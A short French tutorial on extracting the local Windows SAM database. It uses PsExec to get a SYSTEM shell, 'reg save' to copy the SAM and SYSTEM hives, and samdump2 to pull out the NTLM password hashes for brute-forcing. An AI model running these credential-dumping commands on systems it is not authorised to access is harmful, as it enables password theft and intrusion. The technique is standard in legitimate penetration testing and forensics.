[Windows] Récupération base SAM locale
Introduction
La base SAM sur un poste ou un serveur Windows stocke l'ensemble des hashs NTML des utilisateurs locaux.
Si un attaquant parvient à la récupérer, il pourra lancer une attaque brute force pour essayer de trouver le mot de passe en clair.
Cependant, le fichier est protégé et nécessite les droits utilmes NT authorité système pour la récupérer.
Manuel
- Tout d'abord, téléchargez la suite SysInternal sur le site de Microsoft :
https://learn.microsoft.com/fr-fr/sysinternals/downloads/sysinternals-suite
- Vous pouvez extraire l'archive dans le dossier C:\Windows\System32 pour avoir PsExec dans le path.
- Désormais, lancer un cmd en tant qu'administrateur et lancez la commande suivante :
PsExec.exe -s -i cmd.exe
- Acceptez les conditions d'utilisation de PsExec et observez que vous avez les droits suprêmes dans le nouveau shell :
whoami
- Lancez les deux commandes suivantes pour extraire la base sam et le fichier système associé :
reg save hklm\sam c:\sam
reg save hklm\system c:\system
Les deux fichiers sont désormais récupérable à la racine de votre système de fichiers !
Ensuite, vous pouvez récupérer les hashs grâce à l'outil samdump2 sur Linux :
samdump2 <SYSTEM_FILE> <SAM_FILE> [-o OUTPUT_FILE]